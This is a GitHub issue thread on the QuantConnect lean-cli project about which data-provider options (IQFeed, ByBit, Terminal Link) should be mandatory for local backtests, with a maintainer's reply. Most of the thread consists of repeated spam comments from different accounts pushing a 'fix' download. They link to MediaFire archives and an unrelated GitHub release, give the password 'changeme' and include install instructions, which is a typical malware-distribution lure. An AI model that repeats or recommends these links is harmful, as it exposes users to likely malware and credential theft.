### ISSUE TITLE
Required Options for local backtests with a data provider

### ISSUE THREAD

**Issue by DerekMelchin** [QuantConnect/lean-cli#480]
We ran the `lean backtest "<project>"` command with each of the following historical data providers. We found some options for each provider that weren't required by the CLI in non-interactive mode. Should they be required?

IQFeed:
- `--iqfeed-host`

Bitfinex: 
- `--bybit-vip-level`

Terminal Link:
- `--terminal-link-environment`
- `--terminal-link-server-host`
- `--terminal-link-emsx-broker`
- `--terminal-link-openfigi-api-key`
- `--terminal-link-server-auth-id` if you use `--terminal-link-connection-type SAPI`

**Comment by Romazes** [comment]
#### Terminal Link
All parameters should be mandatory for Terminal Link, as they are necessary for the brokerage to run properly - [code](https://github.com/QuantConnect/Lean.Brokerages.TerminalLink/blob/75c51de53831a5017adbfa3e91d3ebb2d912b3f2/QuantConnect.TerminalLink/TerminalLinkBrokerage.DataQueueHandler.cs#L103)
#### IQFeed
We can use the --iqfeed-host property internally.
#### ByBit
Make --bybit-vip-level optional and only use it when operating like a brokerage - [code](https://github.com/QuantConnect/Lean.Brokerages.ByBit/blob/d1703f14870608a93ab69d2b1c4b38c1f23475e5/QuantConnect.BybitBrokerage/BybitBrokerage.DataQueueHandler.cs#L70)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
